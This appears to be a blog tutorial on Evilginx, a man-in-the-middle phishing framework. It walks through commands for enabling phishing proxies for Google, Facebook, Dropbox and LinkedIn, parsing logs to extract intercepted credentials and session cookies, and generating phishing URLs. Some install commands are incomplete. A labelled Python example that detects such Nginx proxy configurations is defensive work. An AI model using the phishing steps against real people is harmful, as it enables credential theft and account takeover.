
Evilginx : Man-In-The-Middle Attack Framework

Written by Mubassir patel


Evilginx is a man-in-the-middle (MITM) framework. Its core runs on the Nginx HTTP server, using proxy_pass and sub_filter to proxy and modify HTTP content while intercepting traffic between client and server.
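
Because this proxying rests on Nginx's proxy_pass and sub_filter directives, a server block whose sub_filter rewrites the hostname of its own proxy_pass upstream is a useful triage signal when reviewing the Nginx configuration of a suspect host. The following added example (not code from Evilginx or from the original article) implements that check in Python; the sample configuration, its placeholder hostnames and the function names are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Constructed sample config; all hostnames are placeholders, not from the page.
SAMPLE_CONF = """
server {
    server_name app.intranet.example;
    location / {
        proxy_pass http://127.0.0.1:8080;
        sub_filter '</head>' '<meta name="env" content="staging"></head>';
    }
}
server {
    server_name accounts.lookalike.example;
    location / {
        proxy_pass https://accounts.brand.example;
        sub_filter 'brand.example' 'lookalike.example';
        sub_filter_once off;
    }
}
"""

DIRECTIVE = re.compile(r"\b(server_name|proxy_pass|sub_filter)\s+([^;]+);")

def server_blocks(conf):
    """Yield the body of each `server { ... }` block via brace matching."""
    conf = re.sub(r"#.*", "", conf)  # drop comments (simplified: ignores quoting)
    for m in re.finditer(r"\bserver\s*\{", conf):
        depth, i = 1, m.end()
        while i < len(conf) and depth:
            depth += {"{": 1, "}": -1}.get(conf[i], 0)
            i += 1
        yield conf[m.end():i - 1]

def audit(conf):
    """Flag server blocks whose sub_filter rewrites the proxied upstream's hostname."""
    findings = []
    for body in server_blocks(conf):
        names, upstreams, searches = [], [], []
        for key, val in DIRECTIVE.findall(body):
            if key == "server_name":
                names += val.split()
            elif key == "proxy_pass":
                upstreams.append(urlsplit(val.strip()).hostname or val.strip())
            else:  # sub_filter: the first argument is the string searched for
                searches.append(val.split()[0].strip("'\""))
        hits = [(u, s) for u in upstreams for s in searches if s and s in u]
        if hits:
            findings.append({"server_name": names, "rewritten_upstreams": hits})
    return findings
```

Calling audit() on the text of a configuration file returns one finding per flagged server block; the first sample block is not flagged because its sub_filter does not touch the upstream hostname.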

Installation Of Evilginx:

Evilginx provides an installation script that takes care of installing the whole package on any Debian wheezy/jessie machine, in a fire-and-forget manner.

git clone
cd evilginx
chmod 700


            _ _       _            
           (_) |     (_)           
  _____   ___| | __ _ _ _ __ __  __
 / _ \ \ / / | |/ _` | | '_ \\ \/ /
|  __/\ V /| | | (_| | | | | |>  < 
 \___| \_/ |_|_|\__, |_|_| |_/_/\_\
                 __/ |             
 by @mrgretzky  |___/          v1.0

usage: [-h] {setup,parse,genurl} ...

positional arguments:
    setup               Configure Evilginx.
    parse               Parse log file(s).
    genurl              Generate phishing URL.

optional arguments:
  -h, --help            show this help message and exit


Enable or disable site configurations for use with the Nginx server:

usage: setup [-h] [-d DOMAIN] [-y]
                         (-l | --enable ENABLE | --disable DISABLE)

optional arguments:
  -h, --help            show this help message and exit
  -d DOMAIN, --domain DOMAIN
                        Your phishing domain.
  -y                    Answer all questions with 'Yes'.
  -l, --list            List available supported apps.
  --enable ENABLE       Enable following site by name.
  --disable DISABLE     Disable following site by name.

List available site configuration templates:

python setup -l

Listing available supported sites:

 - dropbox (/root/evilginx/sites/dropbox/config)
   subdomains: www
 - google (/root/evilginx/sites/google/config)
   subdomains: accounts, ssl
 - facebook (/root/evilginx/sites/facebook/config)
   subdomains: www, m
 - linkedin (/root/evilginx/sites/linkedin/config)
   subdomains: www

Enable the google phishing site with a preregistered phishing domain:

python setup --enable google -d

Disable facebook phishing site:

python setup --disable facebook

Parse Nginx logs to extract intercepted login credentials and session cookies. By default, logs are saved in the logs directory, alongside the script.

usage: parse [-h] -s SITE [--debug]

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to parse logs for ('all' to parse logs
                        for all sites).
  --debug               Does not truncate log file after parsing.

Parse logs only for google site:

python parse -s google

Parse logs for all available sites:

python parse -s all

Generate URL

usage: genurl [-h] -s SITE -r REDIRECT

optional arguments:
  -h, --help            show this help message and exit
  -s SITE, --site SITE  Name of site to generate link for.
  -r REDIRECT, --redirect REDIRECT
                        Redirect user to this URL after successful sign-in.

Generate a google phishing URL that will redirect the victim to a rickroll video on successful login:

python genurl -s google -r

Generated following phishing URLs:


About the author

Mubassir patel

Mubassir is the founder and developer of this site. He is a computer science engineer with a deep interest in ethical hacking, penetration testing, website development and all technology topics.
